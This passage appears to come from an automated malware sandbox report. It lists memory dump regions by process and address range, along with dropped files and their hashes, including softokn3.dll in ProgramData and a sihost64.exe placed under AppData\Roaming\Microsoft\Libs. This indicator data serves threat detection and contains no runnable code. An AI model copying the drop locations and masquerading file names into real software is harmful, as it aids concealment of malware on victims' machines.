memory/3096-171-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3096-170-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3096-169-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3096-168-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3096-167-0x0000000000400000-0x000000000051E000-memory.dmp

memory/3096-165-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/4948-180-0x0000000000400000-0x00000000004E4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

MD5 b7161c0845a64ff6d7345b67ff97f3b0
SHA1 d223f855da541fe8e4c1d5c50cb26da0a1deb5fc
SHA256 fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66
SHA512 98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

memory/692-190-0x0000000000400000-0x000000000045B000-memory.dmp

memory/620-193-0x0000000000400000-0x000000000045B000-memory.dmp

memory/840-194-0x0000000000400000-0x0000000002C63000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jobiea_8.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/3320-199-0x0000000000400000-0x000000000041E000-memory.dmp

memory/3320-201-0x0000000004E40000-0x0000000004E52000-memory.dmp

memory/3320-200-0x00000000053F0000-0x0000000005A08000-memory.dmp

memory/3320-202-0x0000000004EA0000-0x0000000004EDC000-memory.dmp

memory/3320-203-0x0000000004EE0000-0x0000000004F2C000-memory.dmp

memory/3320-204-0x00000000051E0000-0x00000000052EA000-memory.dmp

memory/4024-215-0x0000000000400000-0x000000000045B000-memory.dmp

memory/4504-218-0x0000000000400000-0x000000000045B000-memory.dmp

C:\ProgramData\softokn3.dll

MD5 a378c450e6ad9f1e0356ed46da190990
SHA1 d457a2c162391d2ea30ec2dc62c8fb3b973f6a66
SHA256 b745b0c0db87a89de5e542e9ae0a06f585793ac3f4240bff3524e7dbdba79978
SHA512 e6cdc8f570af97e48b1d8968730db0afc46f9dd6ad7366a936a5518801debb61c86cc61526e5e26e7ad3b3daeb76a19b32d7c0da33140597f6d19163683c12b5

memory/4576-238-0x0000000000400000-0x000000000045B000-memory.dmp

memory/4732-240-0x0000000000400000-0x000000000045B000-memory.dmp

memory/2664-244-0x0000000000400000-0x0000000002CBF000-memory.dmp

memory/2664-291-0x0000000000400000-0x0000000002CBF000-memory.dmp

memory/2176-294-0x0000000001540000-0x0000000001552000-memory.dmp

memory/2176-293-0x00000000013A0000-0x00000000013AE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 be0b4b1c809dc419f44b990378cbae31
SHA1 5c40c342e0375d8ca7e4cc4e1b81b7ef20a22806
SHA256 530bd3b9ec17f111b0658fddeb4585cd6bf6edb1561bdebd1622527c36a63f53
SHA512 5ce316cfe5e25b0a54ceb157dee8f85e2c7825d91a0cd5fae0500b68b85dd265903582728d4259428d2e44b561423dac1499edcf0606ac0f78e8485ce3c0af24

memory/4908-321-0x0000000000410000-0x0000000000416000-memory.dmp

memory/1852-326-0x0000000000930000-0x0000000000950000-memory.dmp

memory/1852-325-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1852-323-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1852-327-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1852-330-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1852-329-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1852-328-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1852-331-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1852-332-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1852-333-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1852-334-0x0000000140000000-0x0000000140786000-memory.dmp